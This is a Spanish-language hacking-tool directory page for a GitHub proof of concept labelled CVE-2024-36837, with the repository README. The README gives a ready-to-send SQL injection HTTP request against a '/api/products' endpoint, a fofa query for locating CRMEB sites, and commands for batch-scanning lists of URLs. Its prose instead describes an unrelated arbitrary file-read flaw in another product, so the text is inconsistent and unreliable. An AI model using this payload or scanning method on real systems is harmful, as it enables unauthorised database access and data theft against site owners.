Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/lhc321-source/cve-2024-36837
ReconocimientoAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHublhc321-source/cve-2024-36837

CVE-2024-36837

CVE-2024-36837 Prueba de concepto

Ver Repositorio
2hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
CVE-2024-36837 — CVE-2024-36837 Prueba de concepto | Kitploit

README.md

#CVE-2024-36837

Descargo de responsabilidad

#La interfaz runtimeLog/download de SRM2.0 de 智联云采 tiene una vulnerabilidad de lectura arbitraria de archivos. Un atacante no autenticado puede aprovechar esta vulnerabilidad para leer archivos importantes del sistema (como archivos de configuración de base de datos, archivos de configuración del sistema), archivos de configuración de base de datos, etc., lo que hace que el sitio sea extremadamente inseguro.

Sintaxis de fofa: body="/wap/first/zsff/iconfont/iconfont.css" || body="CRMEB"

#POC:

GET /api/products?limit=20&priceOrder&salesOrder&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5(9753165)))),0x7e),3550) HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15 Connection: close Accept: / Accept-Language: en Accept-Encoding: gzip #Agregue http:// o https:// antes de la URL python 11.py

#Cómo usar python cve.py -h

#Detección por lotes Las direcciones URL en url.txt deben tener http:// o https:// python cve.py -f url.txt

#Detección individual La dirección URL debe tener http:// o https:// python cve.py -u url

Descargar herramienta